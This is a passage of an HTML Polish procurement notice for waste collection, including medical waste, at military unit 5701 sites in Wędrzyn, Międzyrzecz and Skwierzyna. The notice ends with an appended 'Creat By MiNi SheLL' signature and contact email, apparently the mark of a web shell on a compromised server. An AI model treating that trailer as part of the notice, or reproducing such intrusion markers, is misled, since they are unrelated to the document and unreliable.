4)	Dokładna ilość odbieranych odpadów gastronomicznych zostanie każdorazowo ustalana w trakcie ich odbioru w wyniku ważenia, co potwierdzone zostanie w dokumencie PZ stanowiący załącznik do umowy oraz w dokumencie handlowym o ile jest konieczność przestrzegania rozporządzenia (WE)  NR 1774/2002 Parlamentu Europejskiego i Rady z dnia 3 października 2002 r. ustanawiające  przepisy   sanitarne  dotyczące   produktów  ubocznych    pochodzenia    zwierzęcego nieprzeznaczonych do spożycia  przez  ludzi (Dz. U. L 273 z 10.10.2002, str. 1, z późniejszymi zmianami) uwzględniając jego rozdział I, artykuł 1, pkt. 2c. Zestawienie miesięczne przekazanych odpadów ujęte zostanie w karcie przekazania odpadu oraz protokole odbioru usługi.
5)	Z chwilą odbioru odpadów gastronomicznych Wykonawca usługi staje się ich posiadaczem i na nim ciąży obowiązek dalszego gospodarowania nimi, zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. 2010r, nr 185, poz. 1243 z późniejszymi zmianami), aktami wykonawczymi w tym zakresie oraz w zależności od sposobu ich dalszego zagospodarowania jeżeli zachodzi taka potrzeba rozporządzenia (WE)  NR 1774/2002 Parlamentu Europejskiego i Rady z dnia 3 października 2002 r. ustanawiające  przepisy   sanitarne  dotyczące   produktów  ubocznych    pochodzenia    zwierzęcego nieprzeznaczonych do spożycia  przez  ludzi (Dz. U. L 273 z 10.10.2002, str. 1, z późniejszymi zmianami).
6)	Podane ilości przedmiotu zamówienia są ilościami szacunkowymi (planowanymi) i mogą na etapie realizacji zamówienia ulec zmniejszeniu bądź zwiększeniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ŚWIADCZENIE USŁUG POLEGAJACYCH NA: ODBIORZE I TRANSPORCIE DO MIEJSCA DALSZEGO ZAGOSPODAROWANIA BĄDŹ  UTYLIZACJI ODPADÓW Z MIEJSCA ICH WYTWARZANIA Z TERENÓW ADMINISTROWANYCH PRZEZ JEDNOSTKĘ WOJSKOWĄ NR 5701 W M. WĘDRZYN, MIĘDZYRZECZ I SKWIERZYNA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2.
Odbiór i transport do miejsca unieszkodliwienia odpadów o kodzie 18 01 03 - Inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego, o których wiadomo lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt (np. zainfekowane pieluchomajtki, podpaski, podkłady) z wyłączeniem 18 01 80, 18 01 82 nadanym zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. 2001, nr 112, poz. 1206) zwanych dalej odpadami medycznymi w ilości ok. 1 Mg.
1)	Odbiór odpadów następować będzie z miejsca ich wytwarzania określonych w tabeli 2 dwa razy w tygodniu (wtorek i piątek) lub dodatkowo według potrzeb Zamawiającego na jego telefoniczne lub pisemne zgłoszenie.
2)	W ramach usługi Wykonawca dokonywać będzie transportu odpadów do miejsca ich unieszkodliwienia własnym, przystosowanym do tego celu środkiem transportu.
3)	Dokładna ilość odbieranych odpadów medycznych zostanie każdorazowo ustalana w trakcie ich odbioru w wyniku ważenia, co potwierdzone zostanie w karcie przekazania odpadu.
4)	Podane ilości przedmiotu zamówienia są ilościami szacunkowymi (planowanymi) i mogą na etapie realizacji zamówienia ulec zmniejszeniu bądź zwiększeniu.
5)	Z chwilą odbioru odpadów medycznych Wykonawca usługi staje się ich posiadaczem
i na nim ciąży obowiązek dalszego gospodarowania nimi, zgodnie z ustawą z dnia
27 kwietnia 2001 r. o odpadach  (Dz. U. 2010r, nr 185, poz. 1243 z późniejszymi zmianami) oraz aktami wykonawczymi w tym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ŚWIADCZENIE USŁUG POLEGAJACYCH NA: ODBIORZE I TRANSPORCIE DO MIEJSCA DALSZEGO ZAGOSPODAROWANIA BĄDŹ  UTYLIZACJI ODPADÓW Z MIEJSCA ICH WYTWARZANIA Z TERENÓW ADMINISTROWANYCH PRZEZ JEDNOSTKĘ WOJSKOWĄ NR 5701 W M. WĘDRZYN, MIĘDZYRZECZ I SKWIERZYNA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3.
Odbiór i transport do miejsca dalszego zagospodarowania odpadów powstałych w wyniku prowadzonych prac remontowo -obsługowych przy sprzęcie technicznym.
1)	Wykonawca odbioru odpadów dokonywać będzie z miejsca ich wytwarzania w ilościach określonych w tabeli 3 do miejsca ich dalszego zagospodarowania własnym, przystosowanym do tego celu środkiem transportu według potrzeb Zamawiającego na jego telefoniczne lub pisemne zgłoszenie.
2)	Podane ilości przedmiotu zamówienia są ilościami szacunkowymi (planowanymi) i mogą na etapie realizacji zamówienia ulec zmniejszeniu bądź zwiększeniu.
3)	Dokładna ilość odbieranych odpadów powstałych w wyniku prowadzonych prac remontowo -obsługowych przy sprzęcie technicznym zostanie każdorazowo ustalana 
w trakcie ich odbioru w wyniku ważenia, co potwierdzone zostanie w karcie przekazania odpadu.
4)	Z chwilą odbioru odpadów powstałych w wyniku prowadzonych prac remontowo -obsługowych przy uzbrojeniu i sprzęcie technicznym Wykonawca usługi staje się ich posiadaczem i na nim ciąży obowiązek dalszego gospodarowania nimi, zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach  (Dz. U. 2010r, nr 185, poz. 1243 z późniejszymi zmianami) oraz aktami wykonawczymi w tym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com